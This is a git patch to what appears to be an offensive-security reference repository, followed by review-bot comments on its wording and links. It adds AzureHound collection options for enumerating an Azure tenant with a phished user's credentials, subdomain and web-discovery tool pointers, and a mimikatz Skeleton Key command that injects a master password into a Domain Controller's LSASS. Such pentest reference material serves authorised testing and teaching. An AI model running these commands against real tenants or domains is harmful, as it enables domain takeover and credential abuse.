From b7043cfedde98e92ab158e2240bfbc2d34a3f9e1 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 16 Oct 2022 00:27:47 +0200 Subject: [PATCH] Bug Hunting Methodology Update --- .../Cloud - Azure Pentest.md | 19 ++++++++++++++++++- .../Methodology and enumeration.md | 12 +++++++++++- .../Windows - Persistence.md | 8 +++++++- 3 files changed, 36 insertions(+), 3 deletions(-) diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md index 7055f84..348e3be 100644 --- a/Methodology and Resources/Cloud - Azure Pentest.md +++ b/Methodology and Resources/Cloud - Azure Pentest.md 
@@ -95,7 +95,24 @@ ./azurehound -u "phisheduser@contoso.onmicrosoft.com" -p "Password1" list -o initial-scan.json --tenant "contoso.onmicrosoft.com" ./azurehound -a "6b5adee8-..." -s "" --tenant "contoso.onmicrosoft.com" list ./azurehound -j "ey..." --tenant "contoso.onmicrosoft.com" list az-ad - ./azurehound -r "0.ARwA6Wg..." --tenant "contoso.onmicrosoft.com" list + ./azurehound -r "0.ARwA6Wg..." --tenant "contoso.onmicrosoft.com" list users + + # List of collections + az-ad: Collect all information available at the AzureAD tenant level. In most tenants, all users have the ability to read all this information by default. + az-rm: Collect all information available at the AzureRM subscription level. Users do not by default have read access to any of this information. + + apps: Collects AzureAD application registration objects. + devices: Collects AzureAD devices regardless of join type. + groups: Collects AzureAD security-enabled groups, both role eligible and non role eligible. + key-vaults: Collects AzureRM key vaults. + management-groups: Collects AzureRM management group objects + resource-groups: Collects AzureRM resource group objects + roles: Collects AzureAD admin role objects + service-principals: Collects AzureAD service principals + subscriptions: Collevts AzureRM subscriptions + tenants: Collevts AzureAD tenant objects + users: Collects AzureAD users, including any guest users in the target tenant. + virtual-machines: Collects AzureRM virtual machines # GUI access bolt://localhost:7687 diff --git a/Methodology and Resources/Methodology and enumeration.md b/Methodology and Resources/Methodology and enumeration.md index e0bd4f2..5a07049 100644 --- a/Methodology and Resources/Methodology and enumeration.md +++ b/Methodology and Resources/Methodology and enumeration.md 
@@ -47,12 +47,17 @@ ### Network discovery * Subdomains enumeration - * [projectdiscovery/subfinder](https://github.com/projectdiscovery/subfinder): `subfinder -d hackerone.com` + * Enumerate already found subdomains: [projectdiscovery/subfinder](https://github.com/projectdiscovery/subfinder): `subfinder -d hackerone.com` + * Permutate subdomains: [infosec-au/altdns](https://github.com/infosec-au/altdns) + * Bruteforce subdomains: [Josue87/gotator](https://github.com/Josue87/gotator) + * Subdomain takeovers: [EdOverflow/can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz) * Network discovery * Scan IP ranges with `nmap`, [robertdavidgraham/masscan](https://github.com/robertdavidgraham/masscan) and [projectdiscovery/naabu](https://github.com/projectdiscovery/naabu) * Discover services, version and banners +* Review latest acquisitions + * ASN enumeration * [projectdiscovery/asnmap](https://github.com/projectdiscovery/asnmap): `asnmap -a AS45596 -silent` @@ -69,6 +74,11 @@ ### Web discovery +* Locate `robots.txt` file +* Retrieve comments in source code +* Discover URL: [tomnomnom/waybackurls](github.com/tomnomnom/waybackurls) +* Search for `hidden` parameters: [PortSwigger/param-miner](https://github.com/PortSwigger/param-miner) + * List all the subdirectories and files with `gobuster` or `ffuf` ```ps1 # gobuster -w wordlist -u URL -t threads diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 33352ec..5793abc 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md 
@@ -478,8 +478,14 @@ mstsc /v:{ADDRESS} /shadow:{SESSION_ID} /noconsentprompt /prompt ### Skeleton Key +> Inject a master password into the LSASS process of a Domain Controller. + +Requirements: +* Domain Administrator (SeDebugPrivilege) or `NTAUTHORITY\SYSTEM` + ```powershell -# Exploitation Command runned as DA: +# Execute the skeleton key attack +mimikatz "privilege::debug" "misc::skeleton" Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName # Access using the password "mimikatz"
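Review bot: the "List of collections" block in the Cloud - Azure Pentest.md hunk has two spelling errors, `subscriptions: Collevts AzureRM subscriptions` and `tenants: Collevts AzureAD tenant objects`, which should read `Collects`; the same list is also inconsistent about trailing periods (the `az-ad`, `az-rm` and `users` entries end with one, the rest do not), so it is worth normalising before merge. The `az-rm` entry's statement that users have no default read access to AzureRM subscription data is a useful scoping note for anyone reviewing which identities should be able to run the `az-rm` collection at all.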
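Review bot: in the first Methodology and enumeration.md hunk (`@@ -47,12 +47,17 @@`), the label "Enumerate already found subdomains" does not describe what `subfinder -d hackerone.com` does, since subfinder performs passive enumeration from public sources rather than working from a list of known subdomains; "Passive subdomain enumeration" would be accurate. "Permutate subdomains" should read "Permute subdomains", and the new bullet `* Review latest acquisitions` gives the reader no pointer at all (no source, tool or link) where every sibling bullet does, so either add one or fold it into the ASN section it now sits above.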
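Review bot: in the second Methodology and enumeration.md hunk (`@@ -69,6 +74,11 @@`), the link in `* Discover URL: [tomnomnom/waybackurls](github.com/tomnomnom/waybackurls)` has no scheme, so Markdown renderers will treat it as a relative path under the repository rather than an external link; it should be `https://github.com/tomnomnom/waybackurls` like every other link in the file. "Discover URL" should be plural, and the backticks around `hidden` in "Search for `hidden` parameters" mark an ordinary word as code; plain text reads better.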
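Review bot: the Windows - Persistence.md hunk adds `Domain Administrator (SeDebugPrivilege) or NTAUTHORITY\SYSTEM` as the requirement, but the parenthetical reads as if SeDebugPrivilege were a domain role; the actual prerequisite the `privilege::debug` command relies on is local administrator or SYSTEM on the Domain Controller itself (which Domain Admin membership provides), so wording it that way would be clearer. Since the blockquote now says the master password is injected into the LSASS process, the section should also state that the patch is memory-resident and does not survive a reboot of that Domain Controller, which matters both for what "persistence" means here and for defenders deciding whether a reboot clears it. Finally, the new comment `# Execute the skeleton key attack` replaces `# Exploitation Command runned as DA:` but drops the "run as DA" context, so keep the privilege note in the comment or rely on the Requirements list being right above it.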